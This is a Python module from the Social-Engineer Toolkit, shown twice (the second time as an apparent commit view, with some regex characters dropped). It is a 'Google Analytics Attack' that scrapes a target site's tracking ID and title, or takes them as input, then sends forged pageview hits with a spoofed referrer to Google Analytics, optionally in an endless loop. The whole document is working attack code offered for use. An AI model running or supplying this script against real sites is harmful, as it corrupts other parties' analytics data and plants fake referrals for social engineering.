social-engineer-toolkit/modules/google_analytics_attack.py

#!/usr/bin/env python
print "Loading module. Please wait..."
import src.core.setcore 
import sys
import requests
import re
import time
import random

MAIN="Google Analytics Attack by @ZonkSec"
AUTHOR="Tyler Rosonke (@ZonkSec)"

### MAIN ###
def main():
    print_title()
    # determins if auto or manual, then calls functions
    mode_choice = raw_input("[*] Choose mode (automatic/manual): ")
    if mode_choice in ("automatic","auto"):
        print "\n[*] Entering automatic mode.\n"
        url = raw_input("[*] Target website (E.g. 'http://xyz.com/'): ")
        params = auto_params(url)
    elif mode_choice in ("manual","man"):
        print "\n[*] Entering manual mode."
        params = manual_params()
    else:
        print "\n[-] Invalid mode.\n"
        sys.exit()
    # params have been collected, prompts for print
    print "\n[+] Payload ready."
    printchoice = raw_input("\n[*] Print payload?(y/n): ")
    if printchoice == "y":
        print_params(params)
    
    #sends request
    raw_input("\nPress <enter> to send payload.")
    send_spoof(params)

    #prompts for loop, calls function if need be
    loopchoice = raw_input("\n[*] Send payload on loop?(y/n) ")
    if loopchoice == "y":
        looper(params)
    raw_input("\n\nThis module has finished completing. Press <enter> to continue")

### print_params - loops through params and prints
def print_params(params):
    print
    for entry in params:
        print entry + " = " + params[entry]

### looper - prompts for seconds to sleep, starts loop
def looper(params):
    secs = raw_input("[*] Seconds between payload sends: ")
    raw_input("\nSending request every "+secs+" seconds. Use CTRL+C to terminate. Press <enter> to begin loop.")
    while True:
        send_spoof(params)
        time.sleep(int(secs))

### send_spoof - randomizes client id, then sends request to google service
def send_spoof(params):
    params['cid'] = random.randint(100,999)
    r = requests.get('https://www.google-analytics.com/collect', params=params)
    print "\n[+] Payload sent."
    print r.url

### auto_params - makes request to target site, regexes for params
def auto_params(url):
    try: #parses URL for host and page
        m = re.search('(https?:\/\/(.*?))\/(.*)',url)
        host = str(m.group(1))
        page = "/" + str(m.group(3))
    except:
        print "\n[-] Unable to parse URL for host/page. Did you forget an ending '/'?\n"
        sys.exit()
    try: #makes request to target page
        r = requests.get(url)
    except:
        print "\n[-] Unable to reach target website for parsing.\n"
        sys.exit()
    try: #parses target webpage for title
        m = re.search('<title>(.*)<\/title>', r.text)
        page_title = str(m.group(1))
    except:
        print "\n[-] Unable to parse target page for title.\n"
        sys.exit()
    try: #parses target webpage for tracking id
        m = re.search("'(UA-(.*))',", r.text)
        tid = str(m.group(1))
    except:
        print "\n[-] Unable to find TrackingID (UA-XXXXX). Website may not be running Google Anayltics.\n"
        sys.exit()
    #builds params dict
    params = {}
    params['v'] = "1"
    params['tid'] = tid
    params['cid'] = "555"
    params['t'] = "pageview"
    params['dh'] = host
    params['dp'] = page
    params['dt'] = page_title
    params['aip'] = "1"
    params['dr'] = raw_input("\n[*] Enter referral URL to spoof (E.g. 'http://xyz.com/'): ")
    return params

### manual_params - prompts for all params
def manual_params():
    params = {}
    params['v'] = "1"
    params['tid'] = raw_input("\n[*] Enter TrackingID (tid)(UA-XXXXX): ")
    params['cid'] = "555"
    params['t'] = "pageview"
    params['aip'] = "1"
    params['dh'] = raw_input("[*] Enter target host (dh)(E.g. 'http://xyz.xyz)': ")
    params['dp'] = raw_input("[*] Enter target page (dp)(E.g. '/aboutme'): ")
    params['dt'] = raw_input("[*] Enter target page title (dt)(E.g. 'About Me'): ")
    params['dr'] = raw_input("[*] Enter referal page to spoof (dr): ")
    return params

### print_title - prints title and references
def print_title():
    print "\n----------------------------------"
    print "      Google Analytics Attack     "
    print "    By Tyler Rosonke (@ZonkSec)   "
    print "----------------------------------\n"
    print "User-Guide: http://www.zonksec.com/blog/social-engineering-google-analytics/\n"
    print "References:"
    print "-https://developers.google.com/analytics/devguides/collection/protocol/v1/reference"
    print "-https://developers.google.com/analytics/devguides/collection/protocol/v1/parameters\n\n"
add google analytics module 2016-09-28 15:22:55 +00:00			`#!/usr/bin/env python`
			`print "Loading module. Please wait..."`
			`import src.core.setcore`
			`import sys`
			`import requests`
			`import re`
			`import time`
			`import random`

			`MAIN="Google Analytics Attack by @ZonkSec"`
			`AUTHOR="Tyler Rosonke (@ZonkSec)"`

			`### MAIN ###`
			`def main():`
			`print_title()`
			`# determins if auto or manual, then calls functions`
			`mode_choice = raw_input("[*] Choose mode (automatic/manual): ")`
			`if mode_choice in ("automatic","auto"):`
			`print "\n[*] Entering automatic mode.\n"`
			`url = raw_input("[*] Target website (E.g. 'http://xyz.com/'): ")`
			`params = auto_params(url)`
			`elif mode_choice in ("manual","man"):`
			`print "\n[*] Entering manual mode."`
			`params = manual_params()`
			`else:`
			`print "\n[-] Invalid mode.\n"`
			`sys.exit()`
			`# params have been collected, prompts for print`
			`print "\n[+] Payload ready."`
			`printchoice = raw_input("\n[*] Print payload?(y/n): ")`
			`if printchoice == "y":`
			`print_params(params)`

			`#sends request`
			`raw_input("\nPress <enter> to send payload.")`
			`send_spoof(params)`

			`#prompts for loop, calls function if need be`
			`loopchoice = raw_input("\n[*] Send payload on loop?(y/n) ")`
			`if loopchoice == "y":`
			`looper(params)`
			`raw_input("\n\nThis module has finished completing. Press <enter> to continue")`

			`### print_params - loops through params and prints`
			`def print_params(params):`
			`print`
			`for entry in params:`
			`print entry + " = " + params[entry]`

			`### looper - prompts for seconds to sleep, starts loop`
			`def looper(params):`
			`secs = raw_input("[*] Seconds between payload sends: ")`
			`raw_input("\nSending request every "+secs+" seconds. Use CTRL+C to terminate. Press <enter> to begin loop.")`
			`while True:`
			`send_spoof(params)`
			`time.sleep(int(secs))`

			`### send_spoof - randomizes client id, then sends request to google service`
			`def send_spoof(params):`
			`params['cid'] = random.randint(100,999)`
			`r = requests.get('https://www.google-analytics.com/collect', params=params)`
			`print "\n[+] Payload sent."`
			`print r.url`

			`### auto_params - makes request to target site, regexes for params`
			`def auto_params(url):`
			`try: #parses URL for host and page`
			`m = re.search('(https?:\/\/(.?))\/(.)',url)`
			`host = str(m.group(1))`
			`page = "/" + str(m.group(3))`
			`except:`
			`print "\n[-] Unable to parse URL for host/page. Did you forget an ending '/'?\n"`
			`sys.exit()`
			`try: #makes request to target page`
			`r = requests.get(url)`
			`except:`
			`print "\n[-] Unable to reach target website for parsing.\n"`
			`sys.exit()`
			`try: #parses target webpage for title`
			`m = re.search('<title>(.*)<\/title>', r.text)`
			`page_title = str(m.group(1))`
			`except:`
			`print "\n[-] Unable to parse target page for title.\n"`
			`sys.exit()`
			`try: #parses target webpage for tracking id`
			`m = re.search("'(UA-(.*))',", r.text)`
			`tid = str(m.group(1))`
			`except:`
			`print "\n[-] Unable to find TrackingID (UA-XXXXX). Website may not be running Google Anayltics.\n"`
			`sys.exit()`
			`#builds params dict`
			`params = {}`
			`params['v'] = "1"`
			`params['tid'] = tid`
			`params['cid'] = "555"`
			`params['t'] = "pageview"`
			`params['dh'] = host`
			`params['dp'] = page`
			`params['dt'] = page_title`
			`params['aip'] = "1"`
			`params['dr'] = raw_input("\n[*] Enter referral URL to spoof (E.g. 'http://xyz.com/'): ")`
			`return params`

			`### manual_params - prompts for all params`
			`def manual_params():`
			`params = {}`
			`params['v'] = "1"`
			`params['tid'] = raw_input("\n[*] Enter TrackingID (tid)(UA-XXXXX): ")`
			`params['cid'] = "555"`
			`params['t'] = "pageview"`
			`params['aip'] = "1"`
			`params['dh'] = raw_input("[*] Enter target host (dh)(E.g. 'http://xyz.xyz)': ")`
			`params['dp'] = raw_input("[*] Enter target page (dp)(E.g. '/aboutme'): ")`
			`params['dt'] = raw_input("[*] Enter target page title (dt)(E.g. 'About Me'): ")`
			`params['dr'] = raw_input("[*] Enter referal page to spoof (dr): ")`
			`return params`

			`### print_title - prints title and references`
			`def print_title():`
			`print "\n----------------------------------"`
			`print " Google Analytics Attack "`
			`print " By Tyler Rosonke (@ZonkSec) "`
			`print "----------------------------------\n"`
			`print "User-Guide: http://www.zonksec.com/blog/social-engineering-google-analytics/\n"`
			`print "References:"`
			`print "-https://developers.google.com/analytics/devguides/collection/protocol/v1/reference"`
			`print "-https://developers.google.com/analytics/devguides/collection/protocol/v1/parameters\n\n"`